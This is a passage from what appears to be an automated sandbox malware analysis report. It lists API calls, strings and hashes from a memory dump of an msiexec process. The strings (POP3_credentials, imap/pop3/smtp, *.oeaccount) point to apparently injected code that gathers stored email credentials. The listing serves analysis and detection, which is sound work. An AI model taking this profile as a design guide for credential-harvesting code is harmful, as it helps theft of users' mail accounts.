                                                                                                                                                      • Opcode ID: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                                                                                                                      • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                                                                                                                                                      • Opcode Fuzzy Hash: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                                                                                                                      • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 004094C8
                                                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                                                                                                      • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                                                                                                      • memset.MSVCRT ref: 0040950C
                                                                                                                                                      • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                                                                                                      • _strcmpi.MSVCRT ref: 00409531
                                                                                                                                                        • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                                                                                      • String ID: sysdatetimepick32
                                                                                                                                                      • API String ID: 3411445237-4169760276
                                                                                                                                                      • Opcode ID: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                                                                                                      • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                                                                                                                      • Opcode Fuzzy Hash: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                                                                                                      • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 00403504
                                                                                                                                                      • memset.MSVCRT ref: 0040351A
                                                                                                                                                      • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                                                                                                        • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                                                                        • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                                                                      • _mbscat.MSVCRT ref: 0040356D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _mbscatmemset$_mbscpystrlen
                                                                                                                                                      • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                                                                                      • API String ID: 632640181-966475738
                                                                                                                                                      • Opcode ID: 92019086d1fb7d202bc52a9da7d86f13d8a69774ff3458b2053dbeb140317cc9
                                                                                                                                                      • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                                                                                                                      • Opcode Fuzzy Hash: 92019086d1fb7d202bc52a9da7d86f13d8a69774ff3458b2053dbeb140317cc9
                                                                                                                                                      • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
                                                                                                                                                      APIs
                                                                                                                                                      • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                                                                                                      • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                                                                                                      • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                                                                                                      • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                                                                                                      • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3642520215-0
                                                                                                                                                      • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                                                                      • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                                                                                                                      • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                                                                      • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                                                                                                                      APIs
                                                                                                                                                      • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                                                                                                      • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                                                                                                      • GetDC.USER32(00000000), ref: 004072FB
                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                                                                                                                      • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                                                                                                                      • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                                                                                                      • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                                                                                                      • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1999381814-0
                                                                                                                                                      • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                                                                      • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                                                                                                                      • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                                                                      • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                      • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                                                                                      • API String ID: 1297977491-3883738016
                                                                                                                                                      • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                                                                      • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                                                                                                                      • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                                                                      • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                                                                                                                        • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                                                                                                                        • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                                                                        • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                                                                      • memcpy.MSVCRT(?,?,00000040), ref: 0044972E
                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044977B
                                                                                                                                                      • memcpy.MSVCRT(?,?,00000040), ref: 004497F6
                                                                                                                                                        • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000040,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 00449291
                                                                                                                                                        • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000008,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 004492DD
                                                                                                                                                      • memcpy.MSVCRT(?,?,00000000), ref: 00449846
                                                                                                                                                      • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449887
                                                                                                                                                      • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 004498B8
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                      • String ID: gj
                                                                                                                                                      • API String ID: 438689982-4203073231
                                                                                                                                                      • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                                                                      • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                                                                                                                                      • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                                                                      • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __aulldvrm$__aullrem
                                                                                                                                                      • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                                                                                                                                      • API String ID: 643879872-978417875
                                                                                                                                                      • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                                                                                      • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                                                                                                                                      • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                                                                                      • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 0040810E
                                                                                                                                                        • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                                                        • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                                                                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,?,?,00000000,67CB7B60,?), ref: 004081B9
                                                                                                                                                        • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                        • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                                                                                                      • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                                                                                      • API String ID: 524865279-2190619648
                                                                                                                                                      • Opcode ID: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                                                                                                                      • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                                                                                                                      • Opcode Fuzzy Hash: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                                                                                                                      • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                                                                                      • String ID: 0$6
                                                                                                                                                      • API String ID: 2300387033-3849865405
                                                                                                                                                      • Opcode ID: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                                                                                                                      • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                                                                                                                      • Opcode Fuzzy Hash: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                                                                                                                      • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 004076D7
                                                                                                                                                      • sprintf.MSVCRT ref: 00407704
                                                                                                                                                      • strlen.MSVCRT ref: 00407710
                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                                                                      • strlen.MSVCRT ref: 00407733
                                                                                                                                                      • memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpystrlen$memsetsprintf
                                                                                                                                                      • String ID: %s (%s)
                                                                                                                                                      • API String ID: 3756086014-1363028141
                                                                                                                                                      • Opcode ID: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                                                                                                                                      • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                                                                                                                                                      • Opcode Fuzzy Hash: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                                                                                                                                      • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _mbscat$memsetsprintf
                                                                                                                                                      • String ID: %2.2X
                                                                                                                                                      • API String ID: 125969286-791839006
                                                                                                                                                      • Opcode ID: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                                                                                                                      • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                                                                                                                      • Opcode Fuzzy Hash: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                                                                                                                      • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                                                                                                                      APIs
                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
                                                                                                                                                      • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                                                                                                        • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                                                                                                        • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                                                                                                        • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                                                                                        • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                                                        • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                                                                                                        • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                                                                        • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00444206
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$??2@??3@$ByteCharCloseHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                                                                                      • String ID: ACD
                                                                                                                                                      • API String ID: 82305771-620537770
                                                                                                                                                      • Opcode ID: c50c8069a9a8a0753d3fcb8904f6dc24e57909486b41191e56791defa24a5ab0
                                                                                                                                                      • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                                                                                                                      • Opcode Fuzzy Hash: c50c8069a9a8a0753d3fcb8904f6dc24e57909486b41191e56791defa24a5ab0
                                                                                                                                                      • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 004091EC
                                                                                                                                                      • sprintf.MSVCRT ref: 00409201
                                                                                                                                                        • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                                                                                                        • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                                                                        • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                                                                                      • SetWindowTextA.USER32(?,?), ref: 00409228
                                                                                                                                                      • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                                                                                      • String ID: caption$dialog_%d
                                                                                                                                                      • API String ID: 2923679083-4161923789
                                                                                                                                                      • Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                                                                                                      • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                                                                                                                      • Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                                                                                                      • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                                                                                                                      APIs
                                                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                                                                                                                                                      • memset.MSVCRT ref: 00410246
                                                                                                                                                      • memset.MSVCRT ref: 00410258
                                                                                                                                                        • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                                                                      • memset.MSVCRT ref: 0041033F
                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                                                                                                                                      • CloseHandle.KERNEL32(?,0040FE66,?), ref: 004103AE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3974772901-0
                                                                                                                                                      • Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                                                                                                      • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                                                                                                                      • Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                                                                                                      • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                                                                                                                      APIs
                                                                                                                                                      • wcslen.MSVCRT ref: 0044406C
                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                                                                                      • strlen.MSVCRT ref: 004440D1
                                                                                                                                                        • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                                                                                                        • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
                                                                                                                                                      • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 577244452-0
                                                                                                                                                      • Opcode ID: 577707887b9d7bbd390cae1504d1f2340da0442234304708d55a86593fe8f1d4
                                                                                                                                                      • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                                                                                                                      • Opcode Fuzzy Hash: 577707887b9d7bbd390cae1504d1f2340da0442234304708d55a86593fe8f1d4
                                                                                                                                                      • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                        • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                      • _strcmpi.MSVCRT ref: 00404518
                                                                                                                                                      • _strcmpi.MSVCRT ref: 00404536
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _strcmpi$memcpystrlen
                                                                                                                                                      • String ID: imap$pop3$smtp
                                                                                                                                                      • API String ID: 2025310588-821077329
                                                                                                                                                      • Opcode ID: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                                                                                                      • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                                                                                                                      • Opcode Fuzzy Hash: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                                                                                                      • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 0040C02D
                                                                                                                                                        • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                                                                        • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                                                                                        • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                                                                        • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                                                        • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                                                                                                        • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                                                                                                        • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                                                                                                        • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                                                                        • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                                                                                                        • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                                                                        • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
